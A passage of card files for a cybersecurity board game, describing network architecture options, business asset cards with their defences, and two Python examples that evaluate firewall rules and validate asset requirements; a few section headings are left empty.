Network Design:

Internet → Firewall → [DMZ Zone] → Firewall → [Internal Zone] → Firewall → [Admin Zone]
             (Perimeter)    ↓                       ↓                      ↓
                        Web Server            File Server            Domain Controller
                        Email Server          User Workstations      Admin Workstations
                                             Database Server         Backup Server

Three Zones:

  1. DMZ (Demilitarized Zone) - Internet-facing systems
     - Email Server, Web Server
     - Direct internet access controlled via firewall
     - If compromised, firewall prevents spread to internal zone

  2. Internal Zone - Business systems
     - File Server, Database Server, User Workstations
     - Can reach DMZ for legitimate purposes
     - Cannot reach Admin Zone

  3. Admin Zone - Administrative access and privileged systems
     - Domain Controller, Backup Server
     - Only reachable from specific admin workstations
     - Contains most sensitive access

Firewall Rules:
  - Internet → DMZ: Allowed (limited ports)
  - DMZ → Internal: Blocked (one-way dependency if needed)
  - Internal → Admin: Blocked (strict isolation)
  - Admin → Internal: Allowed (admin management of internal systems)
  - Admin → DMZ: Allowed (admin management of DMZ)

What This Means for Security:
  - Advantages: Limits lateral movement (attacker on web server can't reach database server directly)
  - Disadvantages: More complex to design and manage

Who Uses This:
  - Most medium-sized organizations (50-500 employees)
  - Organizations with some web/email presence
  - Organizations that want segmentation without extreme complexity

Against Incident Response Threats:
  - T-04 (Lateral Movement): Firewall rules block direct SMB access between zones; attacker must find alternate path
  - T-06 (Mimikatz): DC is in Admin Zone, isolated from compromised internal system
  - T-11 (Data Exfil): Must exit through firewall, can be monitored


ARCH-03: Fully Isolated (Zero Trust Model)

Cost: 12 Budget
Complexity: 4/5 (complex, requires careful design)
Security Posture: Very High
Performance: Lower (strict controls add latency)

Description: Network divided into many small segments, each with strict firewall rules. No implicit trust based on network location—every connection is verified. Approximates zero-trust architecture.

Network Design:

Internet → Firewall → [DMZ Segment] → Firewall → [Each Server has own segment]
                                                   + User segment
                                                   + Admin segment
                                                   + Development segment
                                                   + Backup segment
                                                   + Legacy segment

Each connection between segments requires explicit allow rule.

Segment Isolation:
  - Every major system or group gets its own segment
  - Database server isolated from file server
  - Email server isolated from web server
  - User workstations isolated from each other (per-user or small group segments)
  - Development isolated from production
  - Admin segment for domain controllers only
  - Legacy systems isolated from modern systems

Firewall Rules:
  - Default deny: Any traffic not explicitly allowed is blocked
  - Explicit allows: Every needed connection has a specific rule
  - Unidirectional: Rules are directional (client→server, not server→client)
  - Port specific: Rules specify exact port, not ranges

What This Means for Security:
  - Advantages: Lateral movement is nearly impossible—even if one system is compromised, firewall blocks reach to others
  - Disadvantages: Very complex to design, expensive to implement, difficult to troubleshoot when legitimate traffic is blocked

Who Uses This:
  - Large enterprises with security teams
  - Organizations with strict compliance requirements (finance, healthcare, government)
  - Organizations that assume breach and plan accordingly

Against Incident Response Threats:
  - T-04 (Lateral Movement): Firewall blocks attempt immediately; attacker cannot move
  - T-06 (Mimikatz): Even with DC credentials, accessing other systems requires approval
  - T-11 (Data Exfil): Exfil traffic blocked by firewall rules

Governance: Requires change management process for any new firewall rules
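The firewall rule tables of ARCH-02 (three zones, five rules) and ARCH-03 (default deny, directional, port-specific) can be checked rather than just read. The following added example, which is not part of the game's materials, models a zone-boundary firewall as a rule list with default deny, evaluates the ARCH-02 rule set against the T-04 scenario from the card (a compromised DMZ web server reaching for a database over SMB), and then applies the ARCH-03 audit criterion to show which ARCH-02 rules are too broad. The system-to-zone map, port numbers and the tightened ARCH-03 rule set are assumptions chosen to match the diagrams above.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    src: str               # source zone
    dst: str               # destination zone (rules are directional)
    proto: str             # "tcp", "udp" or "any"
    port: Optional[int]    # None = any destination port
    comment: str = ""


# Constructed system-to-zone map following the ARCH-02 diagram.
ZONE_OF = {
    "internet": "internet",
    "web-server": "dmz", "email-server": "dmz",
    "file-server": "internal", "database-server": "internal", "user-workstation": "internal",
    "domain-controller": "admin", "backup-server": "admin", "admin-workstation": "admin",
}

# The five ARCH-02 rules, with assumed ports. Missing entries are the point: there is no
# DMZ -> Internal, Internal -> Admin or Internet -> Internal rule, so default deny covers them.
ARCH02_RULES = [
    Rule("internet", "dmz", "tcp", 443, "public HTTPS to web server"),
    Rule("internet", "dmz", "tcp", 80, "HTTP redirect to HTTPS"),
    Rule("internet", "dmz", "tcp", 25, "inbound SMTP to email server"),
    Rule("internal", "dmz", "tcp", 443, "users reach the web/email front ends"),
    Rule("admin", "internal", "any", None, "admin management of internal systems"),
    Rule("admin", "dmz", "any", None, "admin management of DMZ"),
]

# The same admin access rewritten ARCH-03 style: one exact port per needed connection.
ARCH03_RULES = ARCH02_RULES[:4] + [
    Rule("admin", "internal", "tcp", 3389, "RDP from admin workstations only"),
    Rule("admin", "internal", "tcp", 22, "SSH from admin workstations only"),
    Rule("admin", "dmz", "tcp", 22, "SSH to DMZ hosts"),
]


def matches(r: Rule, src_zone: str, dst_zone: str, proto: str, port: int) -> bool:
    return (r.src == src_zone and r.dst == dst_zone
            and r.proto in ("any", proto) and r.port in (None, port))


def evaluate(rules: List[Rule], src_host: str, dst_host: str,
             proto: str, port: int) -> Tuple[str, Optional[Rule]]:
    """Decide a new connection attempt: default deny, first matching rule wins.
    Return traffic of an allowed connection is assumed to be handled by state tracking,
    which is why an 'admin -> internal' rule never permits 'internal -> admin'."""
    s, d = ZONE_OF[src_host], ZONE_OF[dst_host]
    if s == d:
        # Same zone: the boundary firewall never sees this traffic (the ARCH-02 limitation
        # that ARCH-03 addresses by giving each system its own segment).
        return "allow", None
    for r in rules:
        if matches(r, s, d, proto, port):
            return "allow", r
    return "deny", None


def overly_broad(rules: List[Rule]) -> List[Rule]:
    """ARCH-03 audit: rules that are not port-specific (any protocol or any port)."""
    return [r for r in rules if r.proto == "any" or r.port is None]


def reachable_pairs(rules: List[Rule], proto: str, port: int) -> List[Tuple[str, str]]:
    """Zone pairs whose boundary still permits proto/port: the cross-zone paths that
    T-04 style lateral movement over that protocol could take."""
    zones = sorted(set(ZONE_OF.values()))
    return [(s, d) for s in zones for d in zones
            if s != d and any(matches(r, s, d, proto, port) for r in rules)]


if __name__ == "__main__":
    print("web -> db SMB:", evaluate(ARCH02_RULES, "web-server", "database-server", "tcp", 445)[0])
    print("SMB paths, ARCH-02:", reachable_pairs(ARCH02_RULES, "tcp", 445))
    print("SMB paths, ARCH-03:", reachable_pairs(ARCH03_RULES, "tcp", 445))
```

Two things the output makes concrete. First, the card's Internal → Admin: Blocked rule taken literally also blocks workstation authentication to the domain controller; a real deployment adds narrow explicit allows for that, which is exactly the ARCH-03 "explicit allows" discipline. Second, the "any/any" admin rules in ARCH-02 leave SMB open from the admin zone into both other zones, so a compromised admin workstation still has a lateral path; the ARCH-03 rewrite closes it without removing legitimate management access.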


ARCH-04: Cloud Hybrid (Mixed On-Premises & Cloud)

Cost: 8 Budget
Complexity: 3/5 (cloud adds complexity)
Security Posture: Medium-High (cloud provider handles some security)
Performance: Medium (internet latency for cloud communication)

Description: Organization has both on-premises infrastructure AND cloud resources. Some applications run on-premises, others run in cloud (AWS, Azure, GCP).

Network Design:

Internet → Firewall → On-Premises Segment
                          ├─ Email Server (on-prem)
                          ├─ File Server (on-prem)
                          ├─ Database Server (on-prem)
                          └─ VPN/Direct Connect → Cloud

                                                 ├─ Web Server (cloud)
                                                 ├─ App Server (cloud)
                                                 ├─ Cloud Storage
                                                 └─ Cloud Database

Connectivity Methods:
  1. VPN: Encrypted tunnel over internet (slower, cheaper)
  2. Direct Connect: Dedicated network connection (faster, more expensive)

What This Means for Security:
  - Advantages: Flexibility (use right tool for each workload), scalability
  - Disadvantages: New attack surface (cloud APIs, IAM), credential management across platforms

Cloud-Specific Risks:
  - Misconfigured S3 buckets (public read access)
  - Cloud IAM overly permissive (too much access)
  - Cloud API keys in source code
  - Data residency in unexpected regions

Who Uses This:
  - Organizations transitioning to cloud (lift-and-shift)
  - Organizations with variable load (burst to cloud)
  - Organizations with development in cloud, production on-prem

Against Incident Response Threats:
  - T-04 (Lateral Movement): Can pivot from on-prem to cloud via cloud APIs
  - T-08 (Cloud breach): New threat class specific to cloud
  - T-13 (Misconfiguration): Cloud-specific attack not in traditional scenarios


ARCH-05: Cloud First (Cloud-Only Infrastructure)

Cost: 6 Budget
Complexity: 2/5 (cloud provider manages complexity)
Security Posture: Medium (cloud provider security + customer configuration)
Performance: Excellent (cloud provider optimization)

Description: All infrastructure is cloud-based. No on-premises data center. Applications, data, and users all in cloud (AWS, Azure, GCP, or SaaS).

Network Design:

Internet → Cloud Edge
            ├─ Web Services (cloud)
            ├─ Application Services (cloud)
            ├─ Database (cloud)
            ├─ Storage (cloud)
            └─ All managed by cloud provider

Deployment Models:
  1. IaaS (Infrastructure as a Service): You manage VMs, they manage infrastructure
  2. PaaS (Platform as a Service): You manage app, they manage platform
  3. SaaS (Software as a Service): Vendor manages everything (Microsoft 365, Salesforce, Slack)

Cloud Provider Responsibilities:
  - Physical security of data centers
  - Network infrastructure
  - Hardware maintenance
  - Some security controls (network, storage)

Customer Responsibilities:
  - IAM configuration (who can access what)
  - Network configuration (security groups, VPCs)
  - Encryption keys (customer-managed or provider-managed)
  - Application security

What This Means for Security:
  - Advantages: Offload infrastructure security to cloud provider, auto-scaling, built-in redundancy
  - Disadvantages: New threat landscape (cloud-specific attacks, misconfiguration)

Cloud-Specific Risks:
  - IAM overly permissive (everyone can do everything)
  - Public buckets/storage (data visible to internet)
  - Unused resources (exposed services)
  - Cross-account/cross-tenant misconfiguration
  - Cloud API abuse (stolen credentials)

Who Uses This:
  - Startups (no on-prem infrastructure needed)
  - SaaS vendors (cloud is core offering)
  - Organizations with distributed teams (no office)
  - Modern organizations building on cloud-native architecture

Against Incident Response Threats:
  - T-08 (Cloud-specific): Entirely new threat surface
  - T-13 (Misconfiguration): Most common cloud vulnerability
  - T-07 (API abuse): Cloud APIs are attack surface


Architecture Comparison Table

| Aspect                       | Flat      | 3-Zone     | Fully Isolated  | Cloud Hybrid     | Cloud First          |
|------------------------------|-----------|------------|-----------------|------------------|----------------------|
| Cost (Budget)                | 0         | 5          | 12              | 8                | 6                    |
| Complexity                   | 1/5       | 2/5        | 4/5             | 3/5              | 2/5                  |
| Lateral Movement Risk        | Very High | Medium     | Very Low        | Medium-High      | Medium               |
| Incident Response Difficulty | Very Easy | Medium     | Hard            | Hard             | Hard                 |
| Operational Overhead         | Low       | Medium     | High            | High             | Low (cloud manages)  |
| Best For                     | Tiny orgs | Medium orgs| Large/sensitive | Hybrid migration | Cloud-native         |
| Scalability                  | Poor      | Good       | Excellent       | Excellent        | Excellent            |
| Cloud Integration            | None      | None       | Optional        | Required         | Only option          |

Selection Guidance for Teams

Choose Flat Network (ARCH-01) if:

Choose 3-Zone (ARCH-02) if:

Choose Fully Isolated (ARCH-03) if:

Choose Cloud Hybrid (ARCH-04) if:

Choose Cloud First (ARCH-05) if:


Architecture Impact on Other Modules

Incident Response

Hardening

Disaster Recovery


Gameplay Notes

Budget Impact

Choosing architecture affects remaining budget for servers and security devices:
  - ARCH-01 (Flat): 0 Budget cost, frees up budget for servers
  - ARCH-02 (3-Zone): 5 Budget cost, medium budget remaining
  - ARCH-03 (Fully Isolated): 12 Budget cost, significant budget consumed
  - ARCH-04 (Cloud Hybrid): 8 Budget cost, cloud connectivity cost
  - ARCH-05 (Cloud First): 6 Budget cost, low cost (cloud provider manages infrastructure)

Firewall Rule Complexity

Higher security architectures require more firewall rules:
  - ARCH-01: 0 rules needed (flat network)
  - ARCH-02: 10-20 rules (3-zone model)
  - ARCH-03: 50-100+ rules (fully isolated, per-system rules)
  - ARCH-04: 20-30 rules (cloud connectivity + on-prem)
  - ARCH-05: 10-15 rules (cloud provider manages most)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use distinct coloring by security level:
     - Red (Low Security): ARCH-01
     - Yellow (Medium Security): ARCH-02
     - Green (High Security): ARCH-03
     - Blue (Cloud Hybrid): ARCH-04
     - Purple (Cloud First): ARCH-05
  3. Include a visual diagram on each card showing network layout
  4. Cut along dotted lines
  5. Create a decision tree reference card to help teams choose architecture

Decision Tree for Architecture Selection

Does your organization use cloud?
├─ No → Do you have >100 people?
│   ├─ No → Choose ARCH-01 (Flat) or ARCH-02 (3-Zone)
│   └─ Yes → Do you have compliance requirements?
│       ├─ No → Choose ARCH-02 (3-Zone)
│       └─ Yes → Choose ARCH-03 (Fully Isolated)
│
├─ Partially (hybrid) → Choose ARCH-04 (Cloud Hybrid)
│
└─ Yes, entirely cloud → Choose ARCH-05 (Cloud First)

Network Building Module: Architecture Cards
Part of Incident Zero, a modular cybersecurity board game
v2.2 - Playtest Edition

cards/network-building/core-deck/asset-cards.md

Network Building Module: Asset Cards

Version: 2.2 - Playtest Edition
Last Updated: July 2026


Overview

Asset Cards represent business requirements or critical functions that the network must support. Each asset card describes a business need, and teams must ensure their network design includes appropriate servers/services to satisfy each requirement.


Asset Cards

ASSET-01: Email

Business Function: Internal and external email communication
Criticality: High (nearly universal requirement)
Impact if Down: Significant (communication stops, customer requests missed)
Compliance Requirements: Email retention (SOX, GDPR), encryption (HIPAA, PCI-DSS)

Description: Organization needs reliable email system for internal communication and external customer contact. Email is both critical infrastructure and significant security risk (phishing, credential attacks, data exfiltration).

Network Requirements:
  - Server: Email Server (SRV-01)
  - Protection: Email Gateway (SEC-06) for phishing/malware filtering
  - Optional: Load Balancer if email server needs redundancy

Security Considerations:
  - Email is primary phishing attack vector (T-01 in Incident Response)
  - Email contains sensitive information (must be encrypted and access-controlled)
  - Email forwarding rules can be abused for data exfiltration
  - Email archive must be protected and retained per compliance requirements

Dependencies:
  - Requires Domain Controller for user authentication
  - Requires backup for email archive recovery
  - Integrates with SIEM for email security event logging

Team Design Validation:
  ✓ Must Include: Email Server or equivalent email service (cloud-based OK)
  ✓ Should Include: Email Gateway for threat filtering
  ✗ Failure Condition: No email capability = cannot satisfy Asset requirement


ASSET-02: Web

Business Function: Public-facing web application or website
Criticality: Medium (business depends on it but alternatives exist)
Impact if Down: Moderate (customers cannot access services, lost sales/engagement)
Compliance Requirements: PCI-DSS (if payments), WCAG accessibility

Description: Organization has public web presence—either corporate website, e-commerce site, or customer portal. Web server is exposed to internet and primary target for web exploits (SQL injection, RCE, DDoS).

Network Requirements:
  - Server: Web Server (SRV-02) in DMZ
  - Protection: WAF (SEC-07) for application-layer attack prevention
  - Optional: Load Balancer (SEC-04) for redundancy and DDoS protection

Security Considerations:
  - Web servers have highest internet attack surface
  - Vulnerable to web exploits (T-02 Watering Hole, T-05 Kernel Exploit in Incident Response)
  - DDoS attacks can take down web server
  - Code injection can compromise entire application
  - Requires patching and web application security testing

Dependencies:
  - Often connects to Database (for dynamic content)
  - May require load balancer for redundancy
  - Requires SIEM monitoring for web security events

Team Design Validation:
  ✓ Must Include: Web Server (SRV-02) or cloud-hosted web service
  ✓ Should Include: WAF for attack protection
  ✓ Should Include: Load Balancer if redundancy needed
  ✗ Failure Condition: No web server = Asset unsatisfied


ASSET-03: Database

Business Function: Data storage and retrieval for critical business data
Criticality: Very High (most sensitive business data)
Impact if Down: Severe (business cannot operate, financial/customer impact)
Compliance Requirements: PCI-DSS, HIPAA, GDPR, SOX (depending on data type)

Description: Centralized database for customer data, financial records, operational data. Database is most valuable attack target—contains the "crown jewels." Database compromise often defines loss condition in Incident Response.

Network Requirements:
  - Server: Database Server (SRV-03) in restricted/admin segment
  - Protection: Network Segmentation (SEC-08) to limit access
  - Optional: Backup Server (SRV-07) for recovery capability

Security Considerations:
  - Database is primary exfiltration target (T-10, T-11 in Incident Response)
  - SQL injection attacks compromise database
  - Credential abuse allows unauthorized access to sensitive data
  - Data exfiltration is often attack goal (customer PII, financial data)
  - Database compromise may be game-loss condition
  - Must have immutable backups for recovery from ransomware

Dependencies:
  - Requires strong authentication (MFA, password vault)
  - Requires Data Loss Prevention (DLP) to prevent exfiltration
  - Requires encryption at rest and in transit
  - Requires database activity monitoring (DAM) for audit

Team Design Validation:
  ✓ Must Include: Database Server or equivalent data store (Cloud Workload hosting is allowed but is a recorded risk)
  ✓ Should Include: Network Segmentation to isolate database access
  ✓ Should Include: Backup Server for disaster recovery
  ✗ Failure Condition: No database = Asset unsatisfied OR unsecured database access = audit finding


ASSET-04: File Storage

Business Function: Shared file storage for documents, projects, compliance records
Criticality: High (business relies on shared documents)
Impact if Down: Moderate-High (work stops, cannot access needed files)
Compliance Requirements: Data retention (GDPR), data classification (HIPAA, PCI-DSS)

Description: Shared network file storage for collaborative work. File servers often contain mixed-sensitivity data (company policy next to customer PII next to trade secrets). Poorly secured file storage is source of data exfiltration and lateral movement.

Network Requirements:
  - Server: File Server (SRV-04) in protected segment
  - Protection: Network Segmentation (SEC-08) to limit file access
  - Optional: DLP (in Hardening module) to prevent sensitive file exfiltration

Security Considerations:
  - File servers are lateral movement target (T-04 in Incident Response)
  - SMB protocol allows attacker to enumerate shares and attempt access
  - Over-permissive file permissions = data exfiltration vector
  - Ransomware frequently targets file servers (T-11 in Incident Response)
  - File permissions audit is critical for compliance

Dependencies:
  - Requires Domain Controller for user authentication
  - Requires Network Segmentation to limit SMB access
  - Requires backup strategy (especially for ransomware recovery)
  - Requires file permission auditing

Team Design Validation:
  ✓ Must Include: File Server or cloud file storage (OneDrive, SharePoint, Google Drive)
  ✓ Should Include: Network Segmentation to restrict access
  ✓ Should Include: Backup for ransomware recovery
  ✗ Failure Condition: No file storage = Asset unsatisfied


ASSET-05: Identity

Business Function: User identity and access management
Criticality: Very High (foundational to all access control)
Impact if Down: Severe (cannot authenticate users, cannot operate)
Compliance Requirements: MFA (various standards), audit logging (GDPR, SOX)

Description: Centralized identity system (Active Directory, Azure AD, Okta) that authenticates users and grants access to resources. Identity compromise is game-over scenario—attacker with access to identity system can impersonate any user.

Network Requirements:
  - Server: Domain Controller (SRV-05) in admin segment
  - Protection: Network Segmentation Switch (SEC-08) — keep the DC in an isolated admin zone
  - Optional: Second Domain Controller for redundancy (full price)

Security Considerations:
  - Domain Controller is most sensitive system (compromise = total infrastructure access)
  - Credential dumping attacks target DC (T-06 Mimikatz in Incident Response)
  - Compromised DC allows attacker to create backdoor accounts
  - Pass-the-hash attacks replay credentials from DC compromise
  - DC must be in isolated segment with strict access control

Dependencies:
  - Requires strong authentication (MFA for all DC access)
  - Requires privileged access workstation (PAW) for admin access
  - Requires immutable backup DC in separate location
  - Requires audit logging of all DC changes

Team Design Validation:
  ✓ Must Include: Domain Controller (on-premises or Azure AD)
  ✓ Should Include: Network Segmentation (isolated admin zone)
  ✓ Should Include: Second Domain Controller for redundancy (optional, full price)
  ✗ Failure Condition: No identity system = the Identity requirement is unsatisfied (design incomplete)


ASSET-06: Development

Business Function: Software development and testing environment
Criticality: Medium (important but not production-critical)
Requirement Strength: Recommended (v2.2) — may be satisfied by overloading another server (+1 Budget per extra service)
Impact if Down: Low-Medium (development delays, but not immediate business impact)
Compliance Requirements: Secrets management (API keys not hardcoded), code scanning

Description: Development and testing infrastructure where software developers build and test applications. The development environment is an often-overlooked security risk because developers prioritize speed over security.

Network Requirements:
  - Server: Development Server (SRV-06) in isolated development segment
  - Protection: Firewall rules prevent dev→prod lateral movement
  - Optional: Code repository (Git, GitHub) for version control

Security Considerations:
  - Development servers often contain production-like data (compliance violation)
  - Developers have broad access (weak access controls)
  - Test credentials and API keys in source code
  - Outdated/unpatched tools (developer tools not security tools)
  - Development system as lateral movement springboard to production
  - Source code repository is high-value target (intellectual property)

Dependencies:
  - Requires separate database from production (never use production data in dev)
  - Requires code review and secrets scanning
  - Requires firewall rules isolating dev from production
  - Requires MFA for code repository access

Team Design Validation:
  ✓ Should Include: Development Server, OR dev services overloaded onto another server (allowed, +1 Budget)
  ✓ Should Isolate: Dev network from production network
  ✓ Should Scan: Code for hardcoded secrets
  ✗ Failure Condition: Using production database in dev = data exposure/compliance violation


ASSET-07: Disaster Recovery

Business Function: Recovery capability for business continuity
Criticality: Very High (determines if business survives major attack/disaster)
Requirement Strength: Required (v2.2)
Impact if Down: Catastrophic (cannot recover from major incident)
Compliance Requirements: Backup retention, recovery SLA (RTO/RPO)

Description: Backup and disaster recovery capability. Organization needs ability to recover from data loss, ransomware, or disaster. Backup/recovery capability is often neglected until it's needed.

Network Requirements:
  - Server: Backup Server (SRV-07) with off-site backups
  - Protection: Immutable backups (WORM storage)
  - 3-2-1 Strategy: 3 copies, 2 media types, 1 off-site

Security Considerations:
  - Ransomware attacks target backup systems (T-11 in Incident Response)
  - Backup must be immutable (attacker cannot modify backups)
  - Backup must be off-site (local backup lost if data center destroyed)
  - Backup testing must be regular (quarterly minimum)
  - Backup credentials must be separate from domain (attacker cannot delete backups)

Dependencies:
  - Requires off-site backup location (geographically separated)
  - Requires immutable storage (WORM or cloud versioning)
  - Requires regular backup restore testing
  - Requires separate backup credentials

Team Design Validation:
  ✓ Must Include: Backup Server with off-site capability
  ✓ Must Test: Recovery procedures (quarterly)
  ✓ Must Implement: 3-2-1 strategy
  ✗ Failure Condition (v2.2): No Backup Server = automatic FAIL on the Disaster Recovery requirement, recorded as a CRITICAL gap (not an instant game loss — but ransomware in later modules becomes unrecoverable)


ASSET-08: VPN/Remote Access

Business Function: Secure remote access for employees and contractors
Criticality: Medium (became High during COVID pandemic)
Impact if Down: Moderate (remote workers cannot work)
Compliance Requirements: MFA (various standards), encryption, audit logging

Description: VPN or similar remote access solution for employees working from home, traveling, or off-site. Remote access expands attack surface but is necessary for modern workforce.

Network Requirements:
  - Device: VPN Gateway (SEC-05) at network perimeter
  - Protection: MFA required for all VPN access
  - Optional: Conditional access policies (restrict access by device/location)

Security Considerations:
  - VPN is attractive attack target (Credential Abuse)
  - Weak VPN credentials easily brute-forced (must use MFA)
  - Compromised home computer connecting via VPN = internal network at risk
  - VPN traffic must be encrypted
  - VPN access must be logged and audited

Dependencies:
  - Requires Domain Controller for user authentication
  - Requires MFA (cannot rely on password alone)
  - Requires endpoint security on remote devices
  - Requires SIEM monitoring of VPN access

Team Design Validation:
  ✓ Should Include: VPN Gateway for remote access
  ✓ Must Implement: MFA for VPN access
  ✓ Should Monitor: VPN access logs in SIEM
  ✗ Failure Condition: Weak VPN security (no MFA) = credential attack vector


Asset Card Summary

| Asset    | Business Function  | Criticality | Server | Key Defense          |
|----------|--------------------|-------------|--------|----------------------|
| ASSET-01 | Email              | High        | SRV-01 | Email Gateway        |
| ASSET-02 | Web                | Medium      | SRV-02 | WAF                  |
| ASSET-03 | Database           | Very High   | SRV-03 | Network Segmentation |
| ASSET-04 | File Storage       | High        | SRV-04 | Network Segmentation |
| ASSET-05 | Identity           | Very High   | SRV-05 | Network Segmentation |
| ASSET-06 | Development        | Medium      | SRV-06 | Network Isolation    |
| ASSET-07 | Disaster Recovery  | Very High   | SRV-07 | Immutable Backups    |
| ASSET-08 | VPN/Remote Access  | Medium      | SEC-05 | MFA                  |

Gameplay Integration

Network Building Module

Asset Cards drive network design decisions:
  1. Display all 8 Asset Cards face-up on the table
  2. Team designs network to satisfy each Asset
  3. For each Asset, team must include appropriate Server and Defenses
  4. Team validates: "Does our network design satisfy this Asset?"

Incident Response Module

Asset Cards provide scenario context:
  - Threat Orchestrator refers to Assets when describing scenarios
  - "Customer database is being exfiltrated" = reference ASSET-03
  - "Email is compromised" = reference ASSET-01
  - Assets help Blue Team understand what they're protecting

Disaster Recovery Module

Asset Cards determine impact assessment:
  - "How many critical systems are down?" = count "Very High" Assets affected
  - Recovery priority = order by Asset criticality
  - RTO (Recovery Time Objective) depends on which Assets must recover first


Expansion Notes

Asset Card Variants (for specific industries)

Financial Services Assets:
  - Trading System (real-time market data)
  - Payment Processing (external integrations)
  - Audit Trail (regulatory requirement)

Healthcare Assets:
  - Electronic Health Records (HIPAA-critical)
  - Prescription Management (pharmacy integration)
  - Patient Portal (external access)

Manufacturing Assets:
  - Industrial Control Systems (safety-critical)
  - Supply Chain Integration (vendor systems)
  - Engineering Data (intellectual property)

Retail Assets:
  - Point of Sale (transaction processing)
  - Inventory Management (supplier integration)
  - Customer Loyalty (marketing data)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by criticality:
     - Red (Very High): ASSET-03, ASSET-05, ASSET-07
     - Orange (High): ASSET-01, ASSET-04
     - Yellow (Medium): ASSET-02, ASSET-06, ASSET-08
  3. Include icons representing each asset:
     - Email: Envelope icon
     - Web: Globe icon
     - Database: Cylinder/drum icon
     - File: Folder icon
     - Identity: ID card / Shield icon
     - Development: Code brackets icon
     - Disaster Recovery: Backup/Archive icon
     - VPN: Lock/tunnel icon
  4. Cut along dotted lines
  5. Create a "Business Requirement Validation Card" that teams use to check off satisfied requirements

Team Validation Checklist (v2.2)

After team completes network design, verify each Asset is satisfied. The checklist only names components that can actually be purchased from the Network Building decks; items in parentheses are recommended, not mandatory.

If any Asset is unsatisfied or under-defended:
  - Network design is incomplete
  - That Asset becomes a vulnerability in Incident Response
  - That Asset affects recovery time in Disaster Recovery
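The checklist above is mechanical enough to script. The following is an added example (not part of the game's own material) that encodes each ASSET card's Team Design Validation block: the Must-Include line is mandatory, each Should-Include line is recommended, and the card's failure condition and recorded-risk wording are applied on top. Card IDs (SRV-xx, SEC-xx) are the deck's; the `CLOUD:` and `OVERLOAD:` tokens, the `vpn_mfa` and `dev_uses_prod_db` flags, and both sample designs are constructed for this example.

```python
"""Asset-card design validation (added example; not from the Incident Zero rules text)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class AssetSpec:
    asset: str
    must: frozenset      # any one member satisfies the Must-Include line; empty = recommended-only card
    should: tuple        # groups of alternatives; any one member satisfies that Should-Include line
    critical: bool = False   # ASSET-07: a missing Must is recorded as a CRITICAL gap


# Cloud equivalents are spelled "CLOUD:<service>" so they sit in the same set as
# card IDs; only cards whose text allows cloud hosting list one (constructed tokens).
SPECS = (
    AssetSpec("ASSET-01", frozenset({"SRV-01", "CLOUD:email"}), (frozenset({"SEC-06"}),)),
    AssetSpec("ASSET-02", frozenset({"SRV-02", "CLOUD:web"}), (frozenset({"SEC-07"}),)),  # LB only if redundancy needed, so not listed
    AssetSpec("ASSET-03", frozenset({"SRV-03", "CLOUD:database"}), (frozenset({"SEC-08"}), frozenset({"SRV-07"}))),
    AssetSpec("ASSET-04", frozenset({"SRV-04", "CLOUD:file"}), (frozenset({"SEC-08"}), frozenset({"SRV-07"}))),
    AssetSpec("ASSET-05", frozenset({"SRV-05", "CLOUD:identity"}), (frozenset({"SEC-08"}),)),
    AssetSpec("ASSET-06", frozenset(), (frozenset({"SRV-06", "OVERLOAD:dev"}),)),   # Recommended (v2.2)
    AssetSpec("ASSET-07", frozenset({"SRV-07"}), (), critical=True),                # Required (v2.2)
    AssetSpec("ASSET-08", frozenset(), (frozenset({"SEC-05"}),)),                   # Should Include
)


def validate(design):
    """Return {asset: (status, notes)}; status is 'satisfied', 'under-defended',
    'unsatisfied' or 'CRITICAL'. `design` is a dict with a 'components' set of
    card IDs/tokens plus the flags 'vpn_mfa' and 'dev_uses_prod_db'."""
    have = set(design["components"])
    report = {}
    for spec in SPECS:
        notes = []
        if spec.must and not (have & spec.must):
            status = "CRITICAL" if spec.critical else "unsatisfied"
            notes.append("Must Include missing: one of " + ", ".join(sorted(spec.must)))
        else:
            status = "satisfied"
            for group in spec.should:
                if not (have & group):
                    status = "under-defended"
                    notes.append("Should Include missing: " + " or ".join(sorted(group)))
        # Card-specific failure conditions and recorded risks from the card text
        if spec.asset == "ASSET-03" and "CLOUD:database" in have and "SRV-03" not in have:
            notes.append("recorded risk: database hosted on a Cloud Workload")
        if spec.asset == "ASSET-06" and design.get("dev_uses_prod_db"):
            status = "unsatisfied"
            notes.append("failure: production database used in dev (data exposure / compliance violation)")
        if spec.asset == "ASSET-08" and "SEC-05" in have and not design.get("vpn_mfa"):
            status = "unsatisfied"
            notes.append("failure: VPN without MFA (credential attack vector)")
        report[spec.asset] = (status, notes)
    return report


def gaps(report):
    """Assets that make the design incomplete (unsatisfied or CRITICAL)."""
    return sorted(a for a, (s, _) in report.items() if s in ("unsatisfied", "CRITICAL"))


def design_complete(report):
    return not gaps(report)


# Constructed sample designs (not from the game).
SOLID_DESIGN = {
    "components": {"SRV-01", "SRV-02", "SRV-03", "SRV-04", "SRV-05", "SRV-06", "SRV-07",
                   "SEC-05", "SEC-06", "SEC-07", "SEC-08"},
    "vpn_mfa": True, "dev_uses_prod_db": False,
}
CHEAP_DESIGN = {   # skipped the backup server and segmentation, dev points at prod data
    "components": {"SRV-01", "SRV-02", "CLOUD:database", "SRV-04", "SRV-05", "SEC-05"},
    "vpn_mfa": False, "dev_uses_prod_db": True,
}

if __name__ == "__main__":
    for name, design in (("solid", SOLID_DESIGN), ("cheap", CHEAP_DESIGN)):
        rep = validate(design)
        print(f"{name}: complete={design_complete(rep)} gaps={gaps(rep)}")
        for asset, (status, notes) in rep.items():
            print(f"  {asset}: {status}" + ("".join("\n    - " + n for n in notes)))
```

The two statuses that matter for play are kept distinct on purpose: an under-defended asset still counts as designed (the team bought the server) but becomes the weak point the Incident Response module will exploit, while an unsatisfied or CRITICAL asset stops the design being accepted at all, matching the "design incomplete" wording on the cards.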


Network Building Module: Asset Cards
Part of Incident Zero, a modular cybersecurity board game
v2.2 - Playtest Edition

cards/network-building/standalone/business-requirement-cards.md

Network Building Standalone: Business Requirement Cards

Version: 2.2 - Playtest Edition
Last Updated: July 2026


Overview

Business Requirement Cards drive the Network Building standalone game. One card is revealed at the start of each turn (Phase 1) and represents what the business demands this quarter. Teams must satisfy the requirement by end of the stated deadline or take the score penalty.


Business Requirement Cards

REQ-01: New Product Launch Website

Type: Growth
Requirement: Marketing is launching a flagship product this quarter and needs a modern public website.
Satisfied By: Web Server (7), OR web service hosted on a Cloud Workload (4)
Score Impact: Missed: -5 points (launch flops; lost sales)


